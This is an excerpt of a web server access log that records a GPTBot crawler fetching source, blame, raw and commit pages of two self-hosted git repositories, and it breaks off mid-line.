+[17/Feb/2026:15:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12724] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13655] [Gzip 9.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12733] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13849] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12940] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12971] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12761] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12973] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12765] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" +[17/Feb/2026:15:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14201] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:15:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12455] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12472] [Gzip 7.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15057] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12798] [Gzip 7.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12506] [Gzip 7.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12794] [Gzip 7.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12501] [Gzip 7.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12767] [Gzip 7.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" +[17/Feb/2026:15:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12763] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" +[17/Feb/2026:15:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14255] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:15:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" +[17/Feb/2026:15:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10301] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10169] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10171] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10300] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10965] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" +[17/Feb/2026:15:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" +[17/Feb/2026:15:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12468] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12436] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 27678] [Gzip 6.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:31:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:15:31:41 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:15:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2findex.html" [Client 74.7.227.38] [Length 23949] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:15:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2findex.html" [Client 74.7.227.38] [Length 61215] [Gzip 9.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:15:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2findex.html" [Client 74.7.227.38] [Length 41205] [Gzip 9.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:15:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 24075] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" +[17/Feb/2026:15:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 24072] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" +[17/Feb/2026:15:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8486] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 